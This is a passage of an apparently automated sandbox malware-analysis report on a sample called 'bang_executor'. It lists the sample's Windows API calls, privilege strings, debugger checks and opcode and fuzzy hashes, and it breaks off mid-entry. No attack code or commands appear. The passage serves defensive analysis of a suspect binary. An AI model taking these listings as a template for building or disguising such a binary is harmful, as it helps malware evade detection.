                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory
                                        • String ID:
                                        • API String ID: 1611563598-0
                                        • Opcode ID: 7ebf5543a3c58b38aad328a82c05585959d487fc843f44481c5a58606983a729
                                        • Instruction ID: 2ee0d08b1c3d32fca2a1a7feae99c0707bcc1ccd27e03816706eb9c8b4a6b736
                                        • Opcode Fuzzy Hash: 7ebf5543a3c58b38aad328a82c05585959d487fc843f44481c5a58606983a729
                                        • Instruction Fuzzy Hash: BDA01130200200AB82000B328F0AA8EBAAAAFA2A20F00C028A00280030CB328820FA00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004FD5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004FD6C7
                                          • Part of subcall function 004FC5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004FC5E5
                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,08ADEBCE,?,00000000,00000001), ref: 004FEB53
                                        • _wcslen.LIBCMT ref: 004FEB8D
                                        • _wcslen.LIBCMT ref: 004FEBA1
                                        • _wcslen.LIBCMT ref: 004FEBC6
                                        • SHFileOperationW.SHELL32(?,?,?,?,00000800), ref: 004FEBFF
                                        • GetFileAttributesW.KERNEL32(?), ref: 004FEC0C
                                        • DeleteFileW.KERNEL32(?), ref: 004FEC1E
                                        • _swprintf.LIBCMT ref: 004FEC43
                                        • GetFileAttributesW.KERNEL32(?), ref: 004FEC52
                                        • MoveFileW.KERNEL32(?,?), ref: 004FEC6B
                                        • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 004FEC7F
                                        • _wcslen.LIBCMT ref: 004FECFA
                                        • _wcslen.LIBCMT ref: 004FED03
                                        • SetWindowTextW.USER32(?,?), ref: 004FED62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandOperationStringsTextWindow_swprintf
                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                        • API String ID: 1861470484-312220925
                                        • Opcode ID: 8ab2f10ad7b18b558199f6d700bb5352f5233c4e5b5be190f130e63fbb999e68
                                        • Instruction ID: 9aff890f3e5e242d30705dab9a4a3df1563fff915a9924fba02b6eabb0911157
                                        • Opcode Fuzzy Hash: 8ab2f10ad7b18b558199f6d700bb5352f5233c4e5b5be190f130e63fbb999e68
                                        • Instruction Fuzzy Hash: 30F1627290024DAADB31EFA1DC85AFF37BCBF49315F04042AFA05D6190EB789A498A55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 004E1366: GetDlgItem.USER32(00000000,00003021), ref: 004E13AA
                                          • Part of subcall function 004E1366: SetWindowTextW.USER32(00000000,005165F4), ref: 004E13C0
                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 004FE602
                                        • EndDialog.USER32(?,00000006), ref: 004FE615
                                        • GetDlgItem.USER32(?,0000006C), ref: 004FE631
                                        • SetFocus.USER32(00000000), ref: 004FE638
                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 004FE66C
                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 004FE69F
                                        • FindFirstFileW.KERNEL32(?,?), ref: 004FE6B5
                                          • Part of subcall function 004FCBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCBEE
                                          • Part of subcall function 004FCBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004FCC05
                                          • Part of subcall function 004FCBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 004FCC19
                                          • Part of subcall function 004FCBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 004FCC2A
                                          • Part of subcall function 004FCBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004FCC42
                                          • Part of subcall function 004FCBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 004FCC66
                                          • Part of subcall function 004FCBC8: _swprintf.LIBCMT ref: 004FCC85
                                        • _swprintf.LIBCMT ref: 004FE704
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 004FE717
                                        • FindClose.KERNEL32(00000000), ref: 004FE71E
                                        • _swprintf.LIBCMT ref: 004FE773
                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 004FE786
                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 004FE7A0
                                        • _swprintf.LIBCMT ref: 004FE7D9
                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 004FE7EC
                                        • _swprintf.LIBCMT ref: 004FE83C
                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 004FE84F
                                          • Part of subcall function 004FD0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004FD0E1
                                          • Part of subcall function 004FD0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,0052272C,?,?), ref: 004FD12A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                        • String ID: %s %s$-P$REPLACEFILEDLG
                                        • API String ID: 3464475507-570988325
                                        • Opcode ID: 0a5ce3e1610327b6649dcc4f7e38724ab71a5bb74fcfd1b1fbd3148e686a72ff
                                        • Instruction ID: dabe14e7015255d0b98e565230c64ee05d33b697d9c9d8ac93d744a7328103b8
                                        • Opcode Fuzzy Hash: 0a5ce3e1610327b6649dcc4f7e38724ab71a5bb74fcfd1b1fbd3148e686a72ff
                                        • Instruction Fuzzy Hash: 4F71E47260834CBBE330ABA1DC4DFFF779CAB89705F00081AB749D2191D77999089A66
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _wcslen.LIBCMT ref: 004E807F
                                        • _wcslen.LIBCMT ref: 004E8112
                                          • Part of subcall function 004E8C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 004E8CB2
                                          • Part of subcall function 004E8C95: OpenProcessToken.ADVAPI32(00000000), ref: 004E8CB9
                                          • Part of subcall function 004E8C95: GetLastError.KERNEL32 ref: 004E8CF6
                                          • Part of subcall function 004E8C95: CloseHandle.KERNEL32(?), ref: 004E8D05
                                          • Part of subcall function 004EBC65: DeleteFileW.KERNELBASE(?,?,?,?,004EB14B,?,00000000,004EAF6E,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?,?), ref: 004EBC82
                                          • Part of subcall function 004EBC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,004EB14B,?,00000000,004EAF6E,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?), ref: 004EBCAE
                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 004E81C1
                                        • CloseHandle.KERNEL32(00000000), ref: 004E81DD
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,08ADEBCE,00000000), ref: 004E8329
                                          • Part of subcall function 004EB7E2: FlushFileBuffers.KERNEL32(?), ref: 004EB7FC
                                          • Part of subcall function 004EB7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 004EB8B0
                                          • Part of subcall function 004EAFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,004EAF75,08ADEBCE,00000000,0051517A,000000FF,?,004E8882,?,?), ref: 004EAFEB
                                          • Part of subcall function 004EC2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,004EBF5E,?,?), ref: 004EC305
                                          • Part of subcall function 004EC2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004EBF5E,?,?), ref: 004EC334
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: File$Close$AttributesCreateDeleteHandleProcess_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationOpenTimeToken
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 1577582944-3508440684
                                        • Opcode ID: 0fc808f4b04dcc16e376d463335cc0ee6eb75063b858d38dbf9c34c5d3233040
                                        • Instruction ID: f11b9fb99d22b620a1b0d42d65c22907f8184d905cc025e050080034f3bbac5a
                                        • Opcode Fuzzy Hash: 0fc808f4b04dcc16e376d463335cc0ee6eb75063b858d38dbf9c34c5d3233040
                                        • Instruction Fuzzy Hash: DED19671900289AFDF21DF62CC45BEFB7A8BF04705F00451EFA59E7281EB78A6448B65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: c9657f068cfaf4868a9126033aa66d97711c3c34c4085064a995c90d142d6f7d
                                        • Instruction ID: f91c51f7b601f3422ee14f97a6b475c0fc3430e90138071e1578e59cc82eaa64
                                        • Opcode Fuzzy Hash: c9657f068cfaf4868a9126033aa66d97711c3c34c4085064a995c90d142d6f7d
                                        • Instruction Fuzzy Hash: C4C23A71E046298FEB25CE289D447EABBB5FB84304F1555EAD44DE7280E7B4AEC18F40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: _swprintf
                                        • String ID: CMT$h%u$hc%u
                                        • API String ID: 589789837-3282847064
                                        • Opcode ID: e88f5ad1149b239e1117a1972517955c399cf358c916083adf3b45030f47aa46
                                        • Instruction ID: c1c6c3d659fb447e86b5650baf6b3693dc2428a2f90959a7050ee43b02f05d7f
                                        • Opcode Fuzzy Hash: e88f5ad1149b239e1117a1972517955c399cf358c916083adf3b45030f47aa46
                                        • Instruction Fuzzy Hash: C9421431A002C49EDF14DF76C885BEE7BA5AF54305F04047FEC4A9B282DB786A49CB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _strlen.LIBCMT ref: 004E35C3
                                          • Part of subcall function 004F3D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,08ADEBCE,?,?,08ADEBCE,00000001,004EDA04,00000000,08ADEBCE,?,0001045C,?,?), ref: 004F3D2C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004E370D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                        • String ID: CMT
                                        • API String ID: 1610651222-2756464174
                                        • Opcode ID: 9a762a15843d714d493215fd9e8ce5ef061417762432fc73ebfebc3860844dd5
                                        • Instruction ID: 78d5aef9453c57f95520d10c1313c699a41f74cc96b4b79cf9ee253af696d226
                                        • Opcode Fuzzy Hash: 9a762a15843d714d493215fd9e8ce5ef061417762432fc73ebfebc3860844dd5
                                        • Instruction Fuzzy Hash: 02623771A002C48FCB16DF76C8896FE7BA1AF15306F08057FE84A9B382D7789A45CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00501FD6
                                        • IsDebuggerPresent.KERNEL32 ref: 005020A2
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005020C2
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 005020CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                        • String ID:
                                        • API String ID: 254469556-0
                                        • Opcode ID: 504ae51cb36cbf5740804b62cd3d07362341e0c302df89c707afe16af5081867
                                        • Instruction ID: dadcde7ffd8268f6c557413aa722a3eaa348e06439a0d57e6d13e6c1ab46ba39
                                        • Opcode Fuzzy Hash: 504ae51cb36cbf5740804b62cd3d07362341e0c302df89c707afe16af5081867
                                        • Instruction Fuzzy Hash: 99311875D452199BDB20DFA4D98DBCCBBB8BF18300F1040AAE50DAB290EB715A88CF05
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualQuery.KERNEL32(80000000,00500AC5,0000001C,00500CBA,00000000,?,?,?,?,?,?,?,00500AC5,00000004,00545D24,00500D4A), ref: 00500B91
                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00500AC5,00000004,00545D24,00500D4A), ref: 00500BAC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: InfoQuerySystemVirtual
                                        • String ID: D
                                        • API String ID: 401686933-2746444292
                                        • Opcode ID: 6f0263e302a0fc09a8d43bd2b44342afb2f9c38800466bd67968410da6e4a54b
                                        • Instruction ID: 7b3edd5e2d3fe15aff61049ce4ea4661ce589e660e3b64bb3fdc71f45ea284f4
                                        • Opcode Fuzzy Hash: 6f0263e302a0fc09a8d43bd2b44342afb2f9c38800466bd67968410da6e4a54b
                                        • Instruction Fuzzy Hash: 2A01F7326401096FCB14DF29DC05FDE7BA9AFC4328F0CC124ED59D7284E634E805C680
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00506577
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00506581
                                        • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 0050658E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 0e7d2993898a31da79cd639aca6e087b23748621237c75b5a4f00f8210649bd6
                                        • Instruction ID: 7c44927ed5d146c7eb1ad85da39e8195b5af4e69d49d09d6a849f0755d5bba12
                                        • Opcode Fuzzy Hash: 0e7d2993898a31da79cd639aca6e087b23748621237c75b5a4f00f8210649bd6
                                        • Instruction Fuzzy Hash: 9831D374941229ABCB21DF64DC897CCBBB8BF48310F5041DAE80CA7291EB309B858F44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                        • Instruction ID: 810940f7a1d9efdf0f6149842db344ac41e95b8c79ce11f8decd3f2d503cf65a
                                        • Opcode Fuzzy Hash: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                        • Instruction Fuzzy Hash: B6022E72E002199BDF24CFA9C8906ADBBF5FF88314F258269D819E7785D730AD45CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004FD0E1
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0052272C,?,?), ref: 004FD12A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: 33f2574111cf799ee8de6c4521f6bf111552bba787ff72a8338da062c5093f9e
                                        • Instruction ID: f84012683071fd4bdb0632bb739d5113e7c2584256be240f9a749eabdddc775b
                                        • Opcode Fuzzy Hash: 33f2574111cf799ee8de6c4521f6bf111552bba787ff72a8338da062c5093f9e
                                        • Instruction Fuzzy Hash: 7C113C39650308BBD711DF64DC46BEA77B8FF19704F00842AF901A72A1D6709A49DB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetLastError.KERNEL32(004E7D6C,?,00000400), ref: 004E7BFF
                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 004E7C20
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 599c60d69ba2d18dcfe3dc5b6b1610f79c6c09fff80cb458eee22822d03ecd8f
                                        • Instruction ID: b690d2d4b9e436b13d011e87e73db3ce25772e01ed780536bac201ae883bb2ca
